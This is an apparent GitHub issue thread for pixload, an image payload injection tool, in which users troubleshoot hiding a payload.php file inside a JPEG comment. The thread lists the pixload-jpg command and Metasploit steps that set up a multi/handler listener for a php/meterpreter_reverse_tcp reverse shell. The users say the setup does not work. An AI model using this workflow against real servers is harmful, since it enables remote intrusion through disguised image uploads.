sighook / pixload

Image Payload Creating/Injecting tools
Do What The F*ck You Want To Public License
1.19k stars 237 forks source link

Easy Fix? Fail to Writeinfo... #17

Closed ChillVibesMushroom closed 1 year ago

ChillVibesMushroom commented 2 years ago

pixload-jpg -P payload.php /home/kali/Downloads/background.png 255 ⨯ ........ JPEG Payload Creator/Injector ........ ............................................... ... https://github.com/chinarulezzz/pixload ... ...............................................

[>] Generating output file [✔] File saved to: /home/kali/Downloads/background.png

[>] Injecting payload into COMMENT [✘] Fail to WriteInfo

ChillVibesMushroom commented 2 years ago

1) install requirements 2) make install inside the pix-load folder

3) run this command

pixload-jpg -P payload.php /home/kali/Downloads/background.jpeg ........ JPEG Payload Creator/Injector ........ ............................................... ... https://github.com/chinarulezzz/pixload ... ...............................................

[>] Injecting payload into COMMENT [✔] Payload was injected successfully

a bunch of code

4) you're welcome

5) msfconsole

6) use exploit/multi/handler

7) set payload php/meterpreter_reverse_tcp

8) set ip:port configurations

Doesn't WORK

what did I do wrong?

aurhack commented 2 years ago

same here

ChillVibesMushroom commented 2 years ago

same here

Did you ever figure it out ?